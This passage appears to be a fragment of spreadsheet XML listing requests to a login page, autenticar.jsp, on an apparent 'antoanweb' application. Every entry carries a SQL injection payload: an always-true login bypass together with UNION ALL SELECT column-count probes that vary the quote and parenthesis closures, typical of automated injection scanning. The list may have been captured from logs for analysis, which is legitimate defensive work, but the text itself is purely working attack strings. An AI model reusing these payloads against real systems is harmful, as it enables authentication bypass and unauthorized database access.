    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselect5692,5692,5692,5692,5692,5692,5692,5692,5692,5692,5692,5692,5692,5692,5692,5692,5692,5692,5692,5692,5692,5692,5692,5692,5692,5692,5692,5692,5692,5692,5692,5692,5692,5692,5692,5692,5692,5692,5692,5692,5692,5692,5692,5692,5692,5692--and((('sbas'like'sbas</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselect5853,5853,5853,5853,5853,5853,5853,5853,5853,5853,5853,5853,5853,5853,5853,5853,5853,5853,5853,5853,5853,5853,5853,5853,5853,5853,5853,5853,5853,5853,5853,5853,5853,5853,5853,5853,5853,5853,5853,5853,5853,5853,5853,5853,5853,5853,5853--and((('zkwu'like'zkwu</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselect6018,6018,6018,6018,6018,6018,6018,6018,6018,6018,6018,6018,6018,6018,6018,6018,6018,6018,6018,6018,6018,6018,6018,6018,6018,6018,6018,6018,6018,6018,6018,6018,6018,6018,6018,6018,6018,6018,6018,6018,6018,6018,6018,6018,6018,6018,6018,6018--and((('xkja'like'xkja</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselect6998,6998,6998,6998,6998,6998,6998,6998,6998,6998,6998,6998,6998,6998,6998,6998,6998,6998,6998,6998,6998,6998,6998,6998,6998,6998,6998,6998,6998,6998,6998,6998,6998,6998,6998,6998,6998,6998,6998,6998,6998,6998,6998,6998,6998,6998,6998,6998,6998--and((('ydng'like'ydng</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselect2856,2856,2856,2856,2856,2856,2856,2856,2856,2856,2856,2856,2856,2856,2856,2856,2856,2856,2856,2856,2856,2856,2856,2856,2856,2856,2856,2856,2856,2856,2856,2856,2856,2856,2856,2856,2856,2856,2856,2856,2856,2856,2856,2856,2856,2856,2856,2856,2856,2856--and((('fryu'like'fryu</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect8067,8067,8067,8067,8067,8067,8067,8067,8067,8067,8067,8067,8067,8067,8067,8067,8067,8067,8067,8067,8067,8067,8067,8067,8067,8067,8067,8067,8067,8067,8067,8067,8067,8067,8067,8067,8067,8067,8067,8067,8067--and'iqtl'like'iqtl</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect4489,4489,4489,4489,4489,4489,4489,4489,4489,4489,4489,4489,4489,4489,4489,4489,4489,4489,4489,4489,4489,4489,4489,4489,4489,4489,4489,4489,4489,4489,4489,4489,4489,4489,4489,4489,4489,4489,4489,4489,4489,4489--and'jjot'like'jjot</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect4860,4860,4860,4860,4860,4860,4860,4860,4860,4860,4860,4860,4860,4860,4860,4860,4860,4860,4860,4860,4860,4860,4860,4860,4860,4860,4860,4860,4860,4860,4860,4860,4860,4860,4860,4860,4860,4860,4860,4860,4860,4860,4860--and'dcgx'like'dcgx</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect7809,7809,7809,7809,7809,7809,7809,7809,7809,7809,7809,7809,7809,7809,7809,7809,7809,7809,7809,7809,7809,7809,7809,7809,7809,7809,7809,7809,7809,7809,7809,7809,7809,7809,7809,7809,7809,7809,7809,7809,7809,7809,7809,7809--and'xsjo'like'xsjo</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect5717,5717,5717,5717,5717,5717,5717,5717,5717,5717,5717,5717,5717,5717,5717,5717,5717,5717,5717,5717,5717,5717,5717,5717,5717,5717,5717,5717,5717,5717,5717,5717,5717,5717,5717,5717,5717,5717,5717,5717,5717,5717,5717,5717,5717--and'fyxa'like'fyxa</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect3213,3213,3213,3213,3213,3213,3213,3213,3213,3213,3213,3213,3213,3213,3213,3213,3213,3213,3213,3213,3213,3213,3213,3213,3213,3213,3213,3213,3213,3213,3213,3213,3213,3213,3213,3213,3213,3213,3213,3213,3213,3213,3213,3213,3213,3213--and'denw'like'denw</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect8890,8890,8890,8890,8890,8890,8890,8890,8890,8890,8890,8890,8890,8890,8890,8890,8890,8890,8890,8890,8890,8890,8890,8890,8890,8890,8890,8890,8890,8890,8890,8890,8890,8890,8890,8890,8890,8890,8890,8890,8890,8890,8890,8890,8890,8890,8890--and'jqxu'like'jqxu</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect4870,4870,4870,4870,4870,4870,4870,4870,4870,4870,4870,4870,4870,4870,4870,4870,4870,4870,4870,4870,4870,4870,4870,4870,4870,4870,4870,4870,4870,4870,4870,4870,4870,4870,4870,4870,4870,4870,4870,4870,4870,4870,4870,4870,4870,4870,4870,4870--and'eych'like'eych</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect6909,6909,6909,6909,6909,6909,6909,6909,6909,6909,6909,6909,6909,6909,6909,6909,6909,6909,6909,6909,6909,6909,6909,6909,6909,6909,6909,6909,6909,6909,6909,6909,6909,6909,6909,6909,6909,6909,6909,6909,6909,6909,6909,6909,6909,6909,6909,6909,6909--and'hjvv'like'hjvv</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect6333,6333,6333,6333,6333,6333,6333,6333,6333,6333,6333,6333,6333,6333,6333,6333,6333,6333,6333,6333,6333,6333,6333,6333,6333,6333,6333,6333,6333,6333,6333,6333,6333,6333,6333,6333,6333,6333,6333,6333,6333,6333,6333,6333,6333,6333,6333,6333,6333,6333--and'sosw'like'sosw</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselect7678,7678,7678,7678,7678,7678,7678,7678,7678,7678,7678,7678,7678,7678,7678,7678,7678,7678,7678,7678,7678,7678,7678,7678,7678,7678,7678,7678,7678,7678,7678,7678,7678,7678,7678,7678,7678,7678,7678,7678,7678--and("mqgp"="mqgp</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselect9910,9910,9910,9910,9910,9910,9910,9910,9910,9910,9910,9910,9910,9910,9910,9910,9910,9910,9910,9910,9910,9910,9910,9910,9910,9910,9910,9910,9910,9910,9910,9910,9910,9910,9910,9910,9910,9910,9910,9910,9910,9910--and("bexy"="bexy</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselect2059,2059,2059,2059,2059,2059,2059,2059,2059,2059,2059,2059,2059,2059,2059,2059,2059,2059,2059,2059,2059,2059,2059,2059,2059,2059,2059,2059,2059,2059,2059,2059,2059,2059,2059,2059,2059,2059,2059,2059,2059,2059,2059--and("ilyw"="ilyw</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselect2012,2012,2012,2012,2012,2012,2012,2012,2012,2012,2012,2012,2012,2012,2012,2012,2012,2012,2012,2012,2012,2012,2012,2012,2012,2012,2012,2012,2012,2012,2012,2012,2012,2012,2012,2012,2012,2012,2012,2012,2012,2012,2012,2012--and("pybg"="pybg</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselect3093,3093,3093,3093,3093,3093,3093,3093,3093,3093,3093,3093,3093,3093,3093,3093,3093,3093,3093,3093,3093,3093,3093,3093,3093,3093,3093,3093,3093,3093,3093,3093,3093,3093,3093,3093,3093,3093,3093,3093,3093,3093,3093,3093,3093--and("clmq"="clmq</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselect5624,5624,5624,5624,5624,5624,5624,5624,5624,5624,5624,5624,5624,5624,5624,5624,5624,5624,5624,5624,5624,5624,5624,5624,5624,5624,5624,5624,5624,5624,5624,5624,5624,5624,5624,5624,5624,5624,5624,5624,5624,5624,5624,5624,5624,5624--and("wvdu"="wvdu</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselect4122,4122,4122,4122,4122,4122,4122,4122,4122,4122,4122,4122,4122,4122,4122,4122,4122,4122,4122,4122,4122,4122,4122,4122,4122,4122,4122,4122,4122,4122,4122,4122,4122,4122,4122,4122,4122,4122,4122,4122,4122,4122,4122,4122,4122,4122,4122--and("rnwb"="rnwb</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselect9921,9921,9921,9921,9921,9921,9921,9921,9921,9921,9921,9921,9921,9921,9921,9921,9921,9921,9921,9921,9921,9921,9921,9921,9921,9921,9921,9921,9921,9921,9921,9921,9921,9921,9921,9921,9921,9921,9921,9921,9921,9921,9921,9921,9921,9921,9921,9921--and("bxss"="bxss</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselect9382,9382,9382,9382,9382,9382,9382,9382,9382,9382,9382,9382,9382,9382,9382,9382,9382,9382,9382,9382,9382,9382,9382,9382,9382,9382,9382,9382,9382,9382,9382,9382,9382,9382,9382,9382,9382,9382,9382,9382,9382,9382,9382,9382,9382,9382,9382,9382,9382--and("pwkx"="pwkx</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselect2826,2826,2826,2826,2826,2826,2826,2826,2826,2826,2826,2826,2826,2826,2826,2826,2826,2826,2826,2826,2826,2826,2826,2826,2826,2826,2826,2826,2826,2826,2826,2826,2826,2826,2826,2826,2826,2826,2826,2826,2826,2826,2826,2826,2826,2826,2826,2826,2826,2826--and("liye"="liye</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselect3889,3889,3889,3889,3889,3889,3889,3889,3889,3889,3889,3889,3889,3889,3889,3889,3889,3889,3889,3889,3889,3889,3889,3889,3889,3889,3889,3889,3889,3889,3889,3889,3889,3889,3889,3889,3889,3889,3889,3889,3889--and(("yqkz"="yqkz</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselect6477,6477,6477,6477,6477,6477,6477,6477,6477,6477,6477,6477,6477,6477,6477,6477,6477,6477,6477,6477,6477,6477,6477,6477,6477,6477,6477,6477,6477,6477,6477,6477,6477,6477,6477,6477,6477,6477,6477,6477,6477,6477--and(("ibfl"="ibfl</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselect8774,8774,8774,8774,8774,8774,8774,8774,8774,8774,8774,8774,8774,8774,8774,8774,8774,8774,8774,8774,8774,8774,8774,8774,8774,8774,8774,8774,8774,8774,8774,8774,8774,8774,8774,8774,8774,8774,8774,8774,8774,8774,8774--and(("hqqz"="hqqz</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselect863,863,863,863,863,863,863,863,863,863,863,863,863,863,863,863,863,863,863,863,863,863,863,863,863,863,863,863,863,863,863,863,863,863,863,863,863,863,863,863,863,863,863,863--and(("yiwt"="yiwt</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselect6050,6050,6050,6050,6050,6050,6050,6050,6050,6050,6050,6050,6050,6050,6050,6050,6050,6050,6050,6050,6050,6050,6050,6050,6050,6050,6050,6050,6050,6050,6050,6050,6050,6050,6050,6050,6050,6050,6050,6050,6050,6050,6050,6050,6050--and(("utva"="utva</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselect9152,9152,9152,9152,9152,9152,9152,9152,9152,9152,9152,9152,9152,9152,9152,9152,9152,9152,9152,9152,9152,9152,9152,9152,9152,9152,9152,9152,9152,9152,9152,9152,9152,9152,9152,9152,9152,9152,9152,9152,9152,9152,9152,9152,9152,9152--and(("ejvz"="ejvz</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselect9184,9184,9184,9184,9184,9184,9184,9184,9184,9184,9184,9184,9184,9184,9184,9184,9184,9184,9184,9184,9184,9184,9184,9184,9184,9184,9184,9184,9184,9184,9184,9184,9184,9184,9184,9184,9184,9184,9184,9184,9184,9184,9184,9184,9184,9184,9184--and(("uvhb"="uvhb</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselect2569,2569,2569,2569,2569,2569,2569,2569,2569,2569,2569,2569,2569,2569,2569,2569,2569,2569,2569,2569,2569,2569,2569,2569,2569,2569,2569,2569,2569,2569,2569,2569,2569,2569,2569,2569,2569,2569,2569,2569,2569,2569,2569,2569,2569,2569,2569,2569--and(("aolg"="aolg</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselect9420,9420,9420,9420,9420,9420,9420,9420,9420,9420,9420,9420,9420,9420,9420,9420,9420,9420,9420,9420,9420,9420,9420,9420,9420,9420,9420,9420,9420,9420,9420,9420,9420,9420,9420,9420,9420,9420,9420,9420,9420,9420,9420,9420,9420,9420,9420,9420,9420--and(("unsb"="unsb</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselect3175,3175,3175,3175,3175,3175,3175,3175,3175,3175,3175,3175,3175,3175,3175,3175,3175,3175,3175,3175,3175,3175,3175,3175,3175,3175,3175,3175,3175,3175,3175,3175,3175,3175,3175,3175,3175,3175,3175,3175,3175,3175,3175,3175,3175,3175,3175,3175,3175,3175--and(("ptnr"="ptnr</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselect8405,8405,8405,8405,8405,8405,8405,8405,8405,8405,8405,8405,8405,8405,8405,8405,8405,8405,8405,8405,8405,8405,8405,8405,8405,8405,8405,8405,8405,8405,8405,8405,8405,8405,8405,8405,8405,8405,8405,8405,8405--and((("cabp"="cabp</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselect3066,3066,3066,3066,3066,3066,3066,3066,3066,3066,3066,3066,3066,3066,3066,3066,3066,3066,3066,3066,3066,3066,3066,3066,3066,3066,3066,3066,3066,3066,3066,3066,3066,3066,3066,3066,3066,3066,3066,3066,3066,3066--and((("emlz"="emlz</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselect3375,3375,3375,3375,3375,3375,3375,3375,3375,3375,3375,3375,3375,3375,3375,3375,3375,3375,3375,3375,3375,3375,3375,3375,3375,3375,3375,3375,3375,3375,3375,3375,3375,3375,3375,3375,3375,3375,3375,3375,3375,3375,3375--and((("fpzi"="fpzi</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselect3155,3155,3155,3155,3155,3155,3155,3155,3155,3155,3155,3155,3155,3155,3155,3155,3155,3155,3155,3155,3155,3155,3155,3155,3155,3155,3155,3155,3155,3155,3155,3155,3155,3155,3155,3155,3155,3155,3155,3155,3155,3155,3155,3155--and((("pcqs"="pcqs</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselect2300,2300,2300,2300,2300,2300,2300,2300,2300,2300,2300,2300,2300,2300,2300,2300,2300,2300,2300,2300,2300,2300,2300,2300,2300,2300,2300,2300,2300,2300,2300,2300,2300,2300,2300,2300,2300,2300,2300,2300,2300,2300,2300,2300,2300--and((("tgyn"="tgyn</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselect8815,8815,8815,8815,8815,8815,8815,8815,8815,8815,8815,8815,8815,8815,8815,8815,8815,8815,8815,8815,8815,8815,8815,8815,8815,8815,8815,8815,8815,8815,8815,8815,8815,8815,8815,8815,8815,8815,8815,8815,8815,8815,8815,8815,8815,8815--and((("xima"="xima</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselect5932,5932,5932,5932,5932,5932,5932,5932,5932,5932,5932,5932,5932,5932,5932,5932,5932,5932,5932,5932,5932,5932,5932,5932,5932,5932,5932,5932,5932,5932,5932,5932,5932,5932,5932,5932,5932,5932,5932,5932,5932,5932,5932,5932,5932,5932,5932--and((("ttal"="ttal</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselect1900,1900,1900,1900,1900,1900,1900,1900,1900,1900,1900,1900,1900,1900,1900,1900,1900,1900,1900,1900,1900,1900,1900,1900,1900,1900,1900,1900,1900,1900,1900,1900,1900,1900,1900,1900,1900,1900,1900,1900,1900,1900,1900,1900,1900,1900,1900,1900--and((("vemm"="vemm</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselect9451,9451,9451,9451,9451,9451,9451,9451,9451,9451,9451,9451,9451,9451,9451,9451,9451,9451,9451,9451,9451,9451,9451,9451,9451,9451,9451,9451,9451,9451,9451,9451,9451,9451,9451,9451,9451,9451,9451,9451,9451,9451,9451,9451,9451,9451,9451,9451,9451--and((("lgao"="lgao</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselect3069,3069,3069,3069,3069,3069,3069,3069,3069,3069,3069,3069,3069,3069,3069,3069,3069,3069,3069,3069,3069,3069,3069,3069,3069,3069,3069,3069,3069,3069,3069,3069,3069,3069,3069,3069,3069,3069,3069,3069,3069,3069,3069,3069,3069,3069,3069,3069,3069,3069--and((("bvcl"="bvcl</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect7888,7888,7888,7888,7888,7888,7888,7888,7888,7888,7888,7888,7888,7888,7888,7888,7888,7888,7888,7888,7888,7888,7888,7888,7888,7888,7888,7888,7888,7888,7888,7888,7888,7888,7888,7888,7888,7888,7888,7888,7888--and"exrz"="exrz</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect2312,2312,2312,2312,2312,2312,2312,2312,2312,2312,2312,2312,2312,2312,2312,2312,2312,2312,2312,2312,2312,2312,2312,2312,2312,2312,2312,2312,2312,2312,2312,2312,2312,2312,2312,2312,2312,2312,2312,2312,2312,2312--and"nwuc"="nwuc</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect7176,7176,7176,7176,7176,7176,7176,7176,7176,7176,7176,7176,7176,7176,7176,7176,7176,7176,7176,7176,7176,7176,7176,7176,7176,7176,7176,7176,7176,7176,7176,7176,7176,7176,7176,7176,7176,7176,7176,7176,7176,7176,7176--and"zdrc"="zdrc</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect4032,4032,4032,4032,4032,4032,4032,4032,4032,4032,4032,4032,4032,4032,4032,4032,4032,4032,4032,4032,4032,4032,4032,4032,4032,4032,4032,4032,4032,4032,4032,4032,4032,4032,4032,4032,4032,4032,4032,4032,4032,4032,4032,4032--and"vpfl"="vpfl</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect6208,6208,6208,6208,6208,6208,6208,6208,6208,6208,6208,6208,6208,6208,6208,6208,6208,6208,6208,6208,6208,6208,6208,6208,6208,6208,6208,6208,6208,6208,6208,6208,6208,6208,6208,6208,6208,6208,6208,6208,6208,6208,6208,6208,6208--and"kvyx"="kvyx</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect1502,1502,1502,1502,1502,1502,1502,1502,1502,1502,1502,1502,1502,1502,1502,1502,1502,1502,1502,1502,1502,1502,1502,1502,1502,1502,1502,1502,1502,1502,1502,1502,1502,1502,1502,1502,1502,1502,1502,1502,1502,1502,1502,1502,1502,1502--and"gskm"="gskm</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect5130,5130,5130,5130,5130,5130,5130,5130,5130,5130,5130,5130,5130,5130,5130,5130,5130,5130,5130,5130,5130,5130,5130,5130,5130,5130,5130,5130,5130,5130,5130,5130,5130,5130,5130,5130,5130,5130,5130,5130,5130,5130,5130,5130,5130,5130,5130--and"hlkm"="hlkm</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect8738,8738,8738,8738,8738,8738,8738,8738,8738,8738,8738,8738,8738,8738,8738,8738,8738,8738,8738,8738,8738,8738,8738,8738,8738,8738,8738,8738,8738,8738,8738,8738,8738,8738,8738,8738,8738,8738,8738,8738,8738,8738,8738,8738,8738,8738,8738,8738--and"iazb"="iazb</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect5865,5865,5865,5865,5865,5865,5865,5865,5865,5865,5865,5865,5865,5865,5865,5865,5865,5865,5865,5865,5865,5865,5865,5865,5865,5865,5865,5865,5865,5865,5865,5865,5865,5865,5865,5865,5865,5865,5865,5865,5865,5865,5865,5865,5865,5865,5865,5865,5865--and"bjsj"="bjsj</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect9710,9710,9710,9710,9710,9710,9710,9710,9710,9710,9710,9710,9710,9710,9710,9710,9710,9710,9710,9710,9710,9710,9710,9710,9710,9710,9710,9710,9710,9710,9710,9710,9710,9710,9710,9710,9710,9710,9710,9710,9710,9710,9710,9710,9710,9710,9710,9710,9710,9710--and"fqur"="fqur</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselect6894,6894,6894,6894,6894,6894,6894,6894,6894,6894,6894,6894,6894,6894,6894,6894,6894,6894,6894,6894,6894,6894,6894,6894,6894,6894,6894,6894,6894,6894,6894,6894,6894,6894,6894,6894,6894,6894,6894,6894,6894--and("dxam"like"dxam</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselect4379,4379,4379,4379,4379,4379,4379,4379,4379,4379,4379,4379,4379,4379,4379,4379,4379,4379,4379,4379,4379,4379,4379,4379,4379,4379,4379,4379,4379,4379,4379,4379,4379,4379,4379,4379,4379,4379,4379,4379,4379,4379--and("qllf"like"qllf</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselect4000,4000,4000,4000,4000,4000,4000,4000,4000,4000,4000,4000,4000,4000,4000,4000,4000,4000,4000,4000,4000,4000,4000,4000,4000,4000,4000,4000,4000,4000,4000,4000,4000,4000,4000,4000,4000,4000,4000,4000,4000,4000,4000--and("keye"like"keye</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselect6677,6677,6677,6677,6677,6677,6677,6677,6677,6677,6677,6677,6677,6677,6677,6677,6677,6677,6677,6677,6677,6677,6677,6677,6677,6677,6677,6677,6677,6677,6677,6677,6677,6677,6677,6677,6677,6677,6677,6677,6677,6677,6677,6677--and("frpa"like"frpa</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselect5949,5949,5949,5949,5949,5949,5949,5949,5949,5949,5949,5949,5949,5949,5949,5949,5949,5949,5949,5949,5949,5949,5949,5949,5949,5949,5949,5949,5949,5949,5949,5949,5949,5949,5949,5949,5949,5949,5949,5949,5949,5949,5949,5949,5949--and("pomt"like"pomt</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselect4830,4830,4830,4830,4830,4830,4830,4830,4830,4830,4830,4830,4830,4830,4830,4830,4830,4830,4830,4830,4830,4830,4830,4830,4830,4830,4830,4830,4830,4830,4830,4830,4830,4830,4830,4830,4830,4830,4830,4830,4830,4830,4830,4830,4830,4830--and("mhgn"like"mhgn</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselect1605,1605,1605,1605,1605,1605,1605,1605,1605,1605,1605,1605,1605,1605,1605,1605,1605,1605,1605,1605,1605,1605,1605,1605,1605,1605,1605,1605,1605,1605,1605,1605,1605,1605,1605,1605,1605,1605,1605,1605,1605,1605,1605,1605,1605,1605,1605--and("luqd"like"luqd</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselect3361,3361,3361,3361,3361,3361,3361,3361,3361,3361,3361,3361,3361,3361,3361,3361,3361,3361,3361,3361,3361,3361,3361,3361,3361,3361,3361,3361,3361,3361,3361,3361,3361,3361,3361,3361,3361,3361,3361,3361,3361,3361,3361,3361,3361,3361,3361,3361--and("cgrf"like"cgrf</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselect2375,2375,2375,2375,2375,2375,2375,2375,2375,2375,2375,2375,2375,2375,2375,2375,2375,2375,2375,2375,2375,2375,2375,2375,2375,2375,2375,2375,2375,2375,2375,2375,2375,2375,2375,2375,2375,2375,2375,2375,2375,2375,2375,2375,2375,2375,2375,2375,2375--and("wwmu"like"wwmu</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselect3531,3531,3531,3531,3531,3531,3531,3531,3531,3531,3531,3531,3531,3531,3531,3531,3531,3531,3531,3531,3531,3531,3531,3531,3531,3531,3531,3531,3531,3531,3531,3531,3531,3531,3531,3531,3531,3531,3531,3531,3531,3531,3531,3531,3531,3531,3531,3531,3531,3531--and("ovza"like"ovza</t>
  </si>
  <si>
